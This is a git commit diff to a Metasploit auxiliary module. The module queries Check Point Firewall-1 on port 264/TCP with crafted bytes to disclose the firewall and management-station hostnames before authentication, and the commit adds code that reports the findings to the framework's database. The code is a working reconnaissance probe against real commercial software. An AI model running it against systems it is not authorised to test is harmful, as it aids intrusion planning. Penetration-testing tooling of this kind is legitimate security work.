Adds reporting to Patrick's Checkpoint module

Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target.
2011-12-20 15:44:05 -06:00 · 2011-12-20 15:44:05 -06:00 · 99556da7ef
parent f997a7fc31
commit 99556da7ef
1 changed files with 35 additions and 13 deletions
--- a/modules/auxiliary/gather/checkpoint_hostname.rb
+++ b/modules/auxiliary/gather/checkpoint_hostname.rb
@ -1,7 +1,3 @@
-##
-# $Id$
-##
-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@ -9,28 +5,26 @@
 # http://metasploit.com/framework/
 ##

-
 require 'msf/core'

-
 class Metasploit3 < Msf::Auxiliary

 	include Msf::Exploit::Remote::Tcp

 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'CheckPoint Firewall-1 Topology Service Hostname Disclosure',
+			'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
 			'Description'    => %q{
-				This module sends a query to the TCP port 264 on CheckPoint
+				This module sends a query to the port 264/TCP on CheckPoint Firewall-1
 				firewalls to obtain the firewall name and management station
-				(such as SmartCenter) name.
+				(such as SmartCenter) name via a pre-authentication topology request.
 			},
 			'Author'         => [ 'patrick' ],
-			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
 					[ 'URL', 'http://www.osisecurity.com.au/advisories/' ],
+					[ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related?
 				]
 		))

@ -45,7 +39,10 @@ class Metasploit3 < Msf::Auxiliary
 	end

 	def run
-		print_status("Attempting to contact Checkpoint FW1 Topology service...")
+		print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
+		fw_hostname = nil
+		sc_hostname = nil
+
 		connect

 		sock.put("\x51\x00\x00\x00")
@ -56,14 +53,39 @@ class Metasploit3 < Msf::Auxiliary
 			sock.put("\x00\x00\x00\x0bsecuremote\x00")
 			res = sock.get_once
 			if (res =~ /CN\=(.+),O\=(.+)\./i)
-				print_good("Firewall Host: #{$1}")
-				print_good("SmartCenter Host: #{$2}")
+				fw_hostname = $1
+				sc_hostname = $2
+				print_good("Firewall Host: #{fw_hostname}")
+				print_good("SmartCenter Host: #{sc_hostname}")
 			end
 		else
 			print_error("Unexpected response:\r\n#{res}")
 		end

+		report_info(fw_hostname,sc_hostname)
+
 		disconnect
 	end

+	# Only trust that it's real if we have a hostname. If you get a funny
+	# response, it might not be what we think it is.
+	def report_info(fw_hostname,sc_hostname)
+		return unless fw_hostname
+		host_info = {
+			:host => datastore['RHOST'],
+			:os_name => "Checkpoint Firewall-1",
+			:purpose => "firewall"
+		}
+		host_info[:name] = fw_hostname
+		host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
+		report_host(host_info)
+		svc_info = {
+			:host => datastore['RHOST'],
+			:port => datastore['RPORT'],
+			:proto => "tcp",
+			:name => "securemote"
+		}
+		report_service(svc_info)
+	end
+
 end